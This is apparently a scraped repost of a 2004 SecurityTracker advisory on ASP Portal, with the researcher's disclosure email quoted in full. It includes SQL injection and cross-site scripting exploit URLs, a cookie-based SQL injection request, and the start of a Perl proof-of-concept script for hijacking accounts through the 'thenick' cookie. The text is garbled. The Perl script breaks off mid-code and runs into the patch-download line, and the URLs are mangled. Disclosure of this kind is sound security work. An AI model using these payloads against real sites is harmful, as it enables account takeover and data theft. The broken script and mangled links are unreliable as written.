ASP Portal Has Multiple Flaws That Let Remote Users Hijack Accounts, Inject SQL Commands, and Conduct Cross

2013 年 11 月 22 日5670

Sign Up

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category:

Application (Forum/Board/Portal)>

ASP Portal

Vendors:

ASP Portal

ASP Portal Has Multiple Flaws That Let Remote Users Hijack Accounts, Inject SQL Commands, and Conduct Cross-Site Scripting Attacks

SecurityTracker Alert ID:1009050

SecurityTracker URL:http://http://www.zjjv.com///id/1009050

CVE Reference:

GENERIC-MAP-NOMATCH

(Links to External Site)

Date:Feb 14 2004

Impact:

Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Fix Available:YesVendor Confirmed:YesExploit Included:Yes

Description:

Manuel Lopez reported several vulnerabilities in ASP Portal. A remote user can inject SQL commands and can hijack user accounts. A remote user can also conduct cross-site scripting attacks.

It is reported that a remote user can modify the value of their 'thenick' cookie to obtain access to a target user's account, including an administrator's account. A demonstration account hijacking exploit is available in the Source Message.

The report also indicates that the 'index.asp' script does not properly validate user-supplied input in the 'pageid' and 'downloadscat' variables. A remote user can reportedly inject SQL commands to be executed by the database. Some demonstration exploit URLs are provided:

http://[target]/index.asp?inc=blog&pageid='[SqlQuery]

http://[target]/index.asp?inc=downloadssub&downloadscat='[SqlQuery]

It is also reported that a remote user can inject SQL commands via the 'thenick' cookie.

It is also reported that the software does not filter HTML code from user-supplied input before displaying information containing that input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASP Portal software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/index.asp?inc='>[XSS]

http://[target]/index.asp?inc=profile&searchtext='>[XSS]

http://[target]/index.asp?inc=forumread&article='>[XSS]

It is also reported that a remote user with an account on the system can conduct cross-site scripting attacks by injecting HTML code in place of the image URL ('photograph URL') on the 'details' page.

Impact:

A remote user can hijack a target user's account.

A remote user can inject SQL commands to be executed by the database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASP Portal software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:

The vendor has reportedly issued a fixed version.

Also, the January patch is available at:

http://http://www.zjjv.com///downloadsviewer.asp?theurl=38

Vendor URL:http://www.zjjv.com// (Links to External Site)

Cause:

Authentication error, Input validation error

Underlying OS:

Windows (Any)


Message History:

None.


Source Message Contents


Date: Sat, 14 Feb 2004 06:21:11 +0100

Subject: ASP Portal Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

Title: ASP Portal Multiple Vulnerabilities

By: Manuel Lpez

Software: Asp Portal

Vendor Description:

ASP Portal is a an ASP powered portal site which uses an Access database to

store all the site info. The

script also includes and easy to use Admin Interface, so you can change

everything you need to online,

which makes maintaing the site very easy.

Severity:

Moderately critical

Impact:

Disclosure of authentication information, Disclosure of user information,

Execution of arbitrary code via

network, Modification of user information, ID Spoofing.

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Description:

---- Cross-Site Scripting ----

This product is vulnerable to the Cross-Site Scripting vulnerability that

would allow attackers to inject

HTML and script codes into the pages and execute it on the client's browser.

http://localhost/index.asp?inc='>[XSS]

http://localhost/index.asp?inc=profile&searchtext='>[XSS]

http://localhost/index.asp?inc=forumread&article='>[XSS]

---- Image ScriptCode Injection ----

An attacker can inject arbitrary HTML or scriptcode instead of an Image in

"photograph URL" of user's

'details' page.

javascript:alert()

---- Sql Injection ----

Another problem of sanitation could lead an attacker to inject SQL code to

manipulate and disclose

various information from the database. The problem is in the fields 'pageid'

and 'downloadscat'.

http://localhost/index.asp?inc=blog&pageid='[SqlQuery]

http://localhost/index.asp?inc=downloadssub&downloadscat='[SqlQuery]

Also it is possible an Sql Injection in the cookie, in 'thenick' field.

GET http://localhost/index.asp HTTP/1.1

Cookie: thenick='[SqlQuery]

---- Cookie Account Hijack ----

It is possible to impersonate others by manipulating the 'thenick' parameter

in the cookie.

Modifying the cookie is possible to gain access to other account. This issue

can be exploited to gain an

administrative account with the service.

---- PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ----

#!/usr/bin/perl -w

## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK

## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm

use IO::Socket;

if (@ARGV < 4)

{

print "\n\n";

print " ____________________________________________________________ \n";

print "| |\n";

print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK |\n";

print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";

print "| |\n";

print "| By: Manuel Lpez #IST |\n";

print "|____________________________________________________________|\n";

print "\n\n";

exit(1);

}

$host = $ARGV[0];

$directorio = $ARGV[1];

$usuario = $ARGV[2];

$fichero = $ARGV[3];

print "\n";

print "----- Conectando <----\n";

$socket = IO::Socket::INET->new(Proto => "tcp",

PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";

print "====> Conectado\n";

print "====> Enviando Datos\n";

$socket->print(<<taqui) or die "write: $!";

GET http://http://www.zjjv.com///downloadsviewer.asp?theurl=38 or buy the new

version.

---- Credits ----

Manuel Lpez ( mantra@gulo.org ) #IST

Special Thanks: -- Aklis -- gulo.org

Kein, Skool, TheChakal, vientoS, |RDR|, NSR500, ^SaRgE^ .. and all the #IST

staff.

Excuse me for speaking English so badly.

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v1.2.1

iD8DBQFALavflZD3/ZFHM4ERApRSAJ46rZRn3OlSXp/k2jXwCXT0S0RLywCgn08e

mx+V1tKxAMSzt7PTgVh2D2A=

=0oiR

-----END PGP SIGNATURE-----




0 0